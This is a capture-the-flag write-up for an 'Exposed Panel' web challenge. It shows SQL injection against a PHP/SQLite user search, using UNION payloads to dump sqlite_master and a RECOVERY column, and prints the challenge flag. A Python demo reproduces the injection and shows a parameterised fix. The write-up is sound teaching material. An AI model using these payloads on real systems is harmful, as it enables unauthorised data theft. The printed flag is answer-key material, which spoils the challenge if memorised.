Exposed Panel

Category

Web

Description

You found an exposed admin panel on a website where you can search the usernames of the users. Can you escalate this further?

Solution

Opening the page, we are given a single input field.

Admin Panel

Searching for % returns the full list of users, which suggests the input lands in a LIKE pattern.

Users search result

Searching for '# instead returns an SQLite error:

Warning: SQLite3::query(): Unable to prepare statement: 1, unrecognized token: "#" in /var/www/html/utils.php on line 8

Fatal error: Uncaught Error: Call to a member function numColumns() on bool in /var/www/html/utils.php:9 Stack trace: #0 /var/www/html/index.php(37): queryTable(Object(SQLite3), 'SELECT name FRO...') #1 {main} thrown in /var/www/html/utils.php on line 9

So we have an SQL injection. The error also tells us that the backend is SQLite, that the query starts with SELECT name FROM ..., and that # is not a comment marker in SQLite. The payloads below therefore close the injected statement with a semicolon: SQLite3::query() prepares only the first statement and never tokenises what follows it, so the trailing characters do no harm. Requesting index.php?query='+UNION+SELECT+sql+FROM+sqlite_master%3B%23 (the search value ' UNION SELECT sql FROM sqlite_master;#) gives us the tables and columns of the database, because sqlite_master stores the CREATE statement of every table.

Database Tables and Columns

Changing the request to index.php?query='+UNION+SELECT+RECOVERY+FROM+USERS%3B-- (the search value ' UNION SELECT RECOVERY FROM USERS;--) retrieves the RECOVERY column of the USERS table that the schema dump revealed.
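To see the mechanics end to end, here is an added example (not the challenge's code and not the team's) that reproduces the injection against an in-memory SQLite database with Python's sqlite3 module and then shows the parameterised query that would have closed it. The table layout, the rows and the exact text of the vulnerable query are assumptions; the write-up only shows that the search term is spliced into a query beginning SELECT name FRO... and run through SQLite. The value in the RECOVERY column is a constructed placeholder, not the real flag.

```python
import sqlite3

# Constructed stand-in for the challenge. Schema, rows and the exact text of
# the vulnerable query are assumptions (see the lead-in above).

PLACEHOLDER_FLAG = "ASV{constructed_placeholder_not_the_real_flag}"


def build_db():
    """In-memory SQLite database with a USERS table like the one dumped above."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, recovery TEXT)")
    db.executemany(
        "INSERT INTO users (name, recovery) VALUES (?, ?)",
        [("alice", "recovery-token-alice"),
         ("bob", "recovery-token-bob"),
         ("admin", PLACEHOLDER_FLAG)],
    )
    return db


def build_vulnerable_sql(user_input):
    """Assumed shape of the query in utils.php: the search term is pasted into a
    LIKE pattern with no escaping. A bare '%' matching every user is what
    points at a LIKE pattern in the first place."""
    return "SELECT name FROM users WHERE name LIKE '%" + user_input + "%'"


def vulnerable_search(db, user_input):
    """Run the spliced query and report ('ok', rows) or ('error', message).

    A failed sqlite3_prepare() surfaces as sqlite3.OperationalError whose text
    is the same SQLite message the PHP warning shows.
    """
    try:
        rows = [row[0] for row in db.execute(build_vulnerable_sql(user_input))]
        return "ok", rows
    except sqlite3.Error as exc:
        return "error", str(exc)


# The search strings from the write-up, URL-decoded. Each injected statement is
# closed with ';' so SQLite never tokenises the trailing "%'" of the original
# query. Python's driver rejects leftover text unless it is an SQL comment, so
# the '--' ending from the second payload is used for both here; PHP's
# SQLite3::query() ignores everything after the first statement, which is why
# the ';#' ending worked against the challenge even though a bare '# did not.
PROBE_PAYLOAD = "'#"
SCHEMA_PAYLOAD = "' UNION SELECT sql FROM sqlite_master;--"
RECOVERY_PAYLOAD = "' UNION SELECT recovery FROM users;--"


def safe_search(db, user_input, allow_wildcards=False):
    """Fixed version: the search term is bound as a parameter, so it can only
    ever be data. By default the LIKE metacharacters are escaped as well, so a
    user can no longer list every account with a bare '%'."""
    if not allow_wildcards:
        user_input = (user_input.replace("\\", "\\\\")
                                .replace("%", "\\%")
                                .replace("_", "\\_"))
    rows = db.execute(
        "SELECT name FROM users WHERE name LIKE ? ESCAPE '\\'",
        ("%" + user_input + "%",),
    )
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = build_db()
    for payload in ("%", PROBE_PAYLOAD, SCHEMA_PAYLOAD, RECOVERY_PAYLOAD):
        print(repr(payload), "->", vulnerable_search(db, payload))
    print("fixed, injection payload:", safe_search(db, RECOVERY_PAYLOAD))
    print("fixed, bare wildcard:", safe_search(db, "%"))
    print("fixed, normal search:", safe_search(db, "ali"))
```

Running the file prints each payload with its outcome: the bare wildcard lists every user, '# fails to prepare with unrecognized token: "#", and the two UNION payloads return the CREATE statement from sqlite_master and the recovery values alongside the user names. Binding the parameter is what removes the injection; the ESCAPE clause is a separate decision about whether users may search with wildcards at all, which on a panel like this one is usually not wanted.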

Recovery Column of Table Users

In the result we find the flag:

ASV{pHp_t@k3s_PhDs}


Exposed Panel ASV DC29 CTF Write-up

By n00bz, 2021-08-20